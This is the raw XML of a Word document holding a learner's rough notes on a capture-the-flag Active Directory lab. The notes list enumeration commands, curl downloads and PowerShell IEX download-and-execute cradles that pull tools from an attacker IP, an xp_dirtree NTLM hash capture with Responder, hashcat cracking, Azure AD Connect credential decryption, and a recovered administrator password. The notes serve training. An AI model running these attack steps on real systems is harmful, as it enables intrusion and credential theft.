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49F6D844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proofErr w:type="spellStart"/>
      <w:r w:rsidR="009B0D0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mentevede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4E592624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F65A9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this AD lab I understand the perfect knowledge of how can be edit the code when the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F65A9B"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 w:rsidR="00F65A9B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection failed and out from the shell. Not just copied from the google how to edit and how to think for that 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3815EEFD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9B0D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9B0D0E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9B0D0E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9B0D0E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9B0D0E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9B0D0E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9B0D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9B0D0E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15DEDEAC" w:rsidR="00843DCE" w:rsidRDefault="00407D6A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rpcclient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‘’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096DCABA" w14:textId="1245DD96" w:rsidR="00407D6A" w:rsidRDefault="00407D6A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enumdomusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0019361E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = notice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0019361E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aad_xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FA542AA" w14:textId="5F03D082" w:rsidR="00407D6A" w:rsidRDefault="000420EF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quertdispinfo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to dump the info of AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A603B50" w14:textId="77777777" w:rsidR="001B392F" w:rsidRDefault="001B392F" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468A7421" w14:textId="6D95E614" w:rsidR="00301CE5" w:rsidRDefault="00301CE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locate Seatbelt = cp seatbelt.exe .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7DDF8A" w14:textId="19C4FB61" w:rsidR="00D30563" w:rsidRDefault="00301CE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python3 -m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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E266F0E" w14:textId="384071A2" w:rsidR="00301CE5" w:rsidRDefault="00301CE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curl 10.10.14.56:8000/Seatbelt.exe -o Seatbelt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E6485" w14:textId="65C5E6BE" w:rsidR="00BF144D" w:rsidRDefault="00593CB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./Seatbelt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C3A0E" w14:textId="45973F2F" w:rsidR="00593CBE" w:rsidRDefault="00593CB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./Seatbelt.exe -group=all = to run all commands</w:t>
      </w:r>
      <w:r w:rsidR="005F5C6B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="005F5C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F5C6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not help anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF4D54" w14:textId="77BECA20" w:rsidR="00BC16B3" w:rsidRDefault="005F5C6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locate winPEAS.exe</w:t>
      </w:r>
      <w:r w:rsidR="00BC16B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">= bin/64/release/winPEAS.exe = cp to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC16B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bhavya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3972459D" w14:textId="51DFF1C4" w:rsidR="00593CBE" w:rsidRDefault="00BC16B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curl 10.10.14.56:8000/winPEAS.exe -o winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E764D3" w14:textId="2D071C9E" w:rsidR="00EB559C" w:rsidRDefault="00EB559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./winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5BD7C" w14:textId="337675C4" w:rsidR="00754D72" w:rsidRDefault="00754D7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when we see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MSequel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server we can </w:t>
      </w:r>
      <w:r w:rsidR="00200493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00200493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XP_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00200493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell to execute commands as the </w:t>
      </w:r>
      <w:r w:rsidR="00582392">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sequel serves. mostly its admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB7043" w14:textId="6EC3534C" w:rsidR="00582392" w:rsidRDefault="0059122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notice that azure admins is the group = it can access to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EEB78" w14:textId="2409310B" w:rsidR="0059122E" w:rsidRDefault="00CA6913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sqlcmd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-L = its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sql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instant for network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD0B41" w14:textId="6BAED10C" w:rsidR="00BB4D44" w:rsidRDefault="00BB4D44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sqlcmd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-Q “select * from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sys.databases</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D599B10" w14:textId="720121B2" w:rsidR="00BB4D44" w:rsidRDefault="00853F73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sqlcmd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-Q “select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name,create_date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from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sys.databases</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987AA7A" w14:textId="29EB61F6" w:rsidR="00853F73" w:rsidRDefault="00F25D87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github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powerupsql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00542127">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = clone it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D8D43" w14:textId="13DBD369" w:rsidR="00542127" w:rsidRDefault="000E67B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cp PowerUpSQL.ps1 to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bhavya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CEAFC93" w14:textId="78B826CB" w:rsidR="000E67BE" w:rsidRDefault="000E67B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IEX(New-Object  Net.WebClient).downloadString(“</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E23342">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.14.56:8000/PowerUpSQL.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E985F6" w14:textId="14DB629F" w:rsidR="000E67BE" w:rsidRDefault="000E67B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google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powwerupsql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cheat sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAAF3C" w14:textId="3E800B85" w:rsidR="000E67BE" w:rsidRDefault="000E67B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Get-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SQLInstanceLocal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-Verbose</w:t>
      </w:r>
      <w:r w:rsidR="00393FD0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we don’t have permission </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AC0BB0" w14:textId="216E1C1D" w:rsidR="00393FD0" w:rsidRDefault="00393FD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so try to find for privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BA40F" w14:textId="3BA3AC3F" w:rsidR="00393FD0" w:rsidRDefault="00393FD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Invoke-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SQLAudit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-Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E2288" w14:textId="3F5CE19A" w:rsidR="00393FD0" w:rsidRDefault="00393FD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notice that at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xp_dirtree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vulnerable and exploitable is yes so go with it where we can crack the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD0EE2" w14:textId="0139CEDF" w:rsidR="00393FD0" w:rsidRDefault="00393FD0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sqlcmd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-Q “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_dirtree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EF1AA6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00EF1AA6" w:rsidRPr="00E23342">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\10.10.14.56\test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EF1AA6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76645557" w14:textId="01B7BD65" w:rsidR="009113F4" w:rsidRDefault="009113F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responder -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28855451" w14:textId="12BAD0C4" w:rsidR="00EF1AA6" w:rsidRDefault="00EF1AA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we obtain the ntlmv2 hash = save it and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hashcat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obtain the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB74399" w14:textId="43290CC0" w:rsidR="00EF1AA6" w:rsidRDefault="003551A6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hashcat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-m 5600 file rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233AA9CE" w14:textId="2E7508DB" w:rsidR="003551A6" w:rsidRDefault="003551A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to find 5600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hashcat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-example-hashes find for netntlmv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6D855" w14:textId="552FB5BC" w:rsidR="009113F4" w:rsidRDefault="003551A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if it cannot then do this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947E10C" w14:textId="77777777" w:rsidR="003551A6" w:rsidRDefault="003551A6" w:rsidP="003551A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hashcat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-m 5600 file rockyou.txt -r rules/best64.rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38603F74" w14:textId="70D39FCF" w:rsidR="003551A6" w:rsidRDefault="003551A6" w:rsidP="003551A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hashcat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-m 5600 file rockyou.txt -r rules/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InsidePro-PasswordsPro.rule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74E77A3C" w14:textId="2D85AF2F" w:rsidR="003551A6" w:rsidRDefault="00224A21" w:rsidP="003551A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still we fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620FCFDB" w14:textId="77777777" w:rsidR="00224A21" w:rsidRDefault="00224A21" w:rsidP="003551A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D58694" w14:textId="77777777" w:rsidR="001F2B37" w:rsidRDefault="001F2B37" w:rsidP="00A41338">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F22E4E2" w14:textId="77777777" w:rsidR="00407D6A" w:rsidRDefault="00407D6A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B563A3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user.lst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users.lst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we obtain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SABatchJobs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fail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</w:p>
    <w:p w14:paraId="65BC452C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smbclients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fails = just try it then move</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B6847A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smbmap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SABatchJobs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SABatchJobs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we have users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04E77B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smbmap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SABatchJobs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SABatchJobs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-r - -exclude SYSVOL,IPC = to notice via endpoints = very effective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A312523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further info suggest its sequel services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="4E7EBA1B" w:rsidR="00843DCE" w:rsidRDefault="00AE0E28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lastRenderedPageBreak/>
        <w:t>smbmap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SABatchJobs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SABatchJobs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-R = to see who can access what and so on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786A3C16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SABatchJobs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/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E901008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mhope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get azure.xml = we obtain the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C3B616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users.lst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‘paste’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mhope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A2D1FCA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correct for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do it = user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40297242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hostname;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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ipconfig = to showcase the screenshots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6907ADC0" w14:textId="2C9B676D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-all = to see the connection of the groups which connect to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577666A" w14:textId="6EB67732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google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">azure AD privilege escalation by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xpn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20A0A1AA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copy that full script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66B03A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 decript.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783871F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IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.56:8000/decript.ps1’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3993D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= It crack the session every time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A7F12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vi that file and change </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37699B13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client = new-object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System.Data.SqlClient.SqlConnection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ArgumentList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“Server=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localhost;Integrated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Security=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true;Initial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Catalog=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ADSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696EF0F5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run it again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EC4AA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obtain the password username=administrator password = d0m@in4dminyeah!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B898C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and its pwn3d!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138886E5" w14:textId="77777777" w:rsidR="00AE0E28" w:rsidRDefault="00AE0E28" w:rsidP="00AE0E2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psexec.py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administrator@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4A9C40BE" w:rsidR="00843DCE" w:rsidRDefault="00AE0E2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administrator Desktop we obtain root.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsid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420EF"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000E67BE"/>
    <w:rsid w:val="00105AFB"/>
    <w:rsid w:val="0019361E"/>
    <w:rsid w:val="001B392F"/>
    <w:rsid w:val="001F2B37"/>
    <w:rsid w:val="00200493"/>
    <w:rsid w:val="00224A21"/>
    <w:rsid w:val="00301CE5"/>
    <w:rsid w:val="003551A6"/>
    <w:rsid w:val="00393FD0"/>
    <w:rsid w:val="00407D6A"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004A7C57"/>
    <w:rsid w:val="00542127"/>
    <w:rsid w:val="0054677A"/>
    <w:rsid w:val="0058024C"/>
    <w:rsid w:val="00582392"/>
    <w:rsid w:val="0059122E"/>
    <w:rsid w:val="00593CBE"/>
    <w:rsid w:val="005F5C6B"/>
    <w:rsid w:val="00754D72"/>
    <w:rsid w:val="00755F71"/>
    <w:rsid w:val="007745B6"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00853F73"/>
    <w:rsid w:val="008F43A0"/>
    <w:rsid w:val="009113F4"/>
    <w:rsid w:val="009B0D0E"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A41338"/>
    <w:rsid w:val="00A42CE5"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AA4850"/>
    <w:rsid w:val="00AE0E28"/>
    <w:rsid w:val="00BB4D44"/>
    <w:rsid w:val="00BC16B3"/>
    <w:rsid w:val="00BF144D"/>
    <w:rsid w:val="00C26A0B"/>
    <w:rsid w:val="00CA6913"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D30563"/>
    <w:rsid w:val="00DB2735"/>
    <w:rsid w:val="00E26B45"/>
    <w:rsid w:val="00EB559C"/>
    <w:rsid w:val="00EF1AA6"/>
    <w:rsid w:val="00EF72E3"/>
    <w:rsid w:val="00F25D87"/>
    <w:rsid w:val="00F35E6A"/>
    <w:rsid w:val="00F511B7"/>
    <w:rsid w:val="00F527F2"/>
    <w:rsid w:val="00F54F9C"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F65A9B"/>
    <w:rsid w:val="00FC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1A6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7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7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\\10.10.14.56\test" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.56:8000/PowerUpSQL.p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47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T16:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>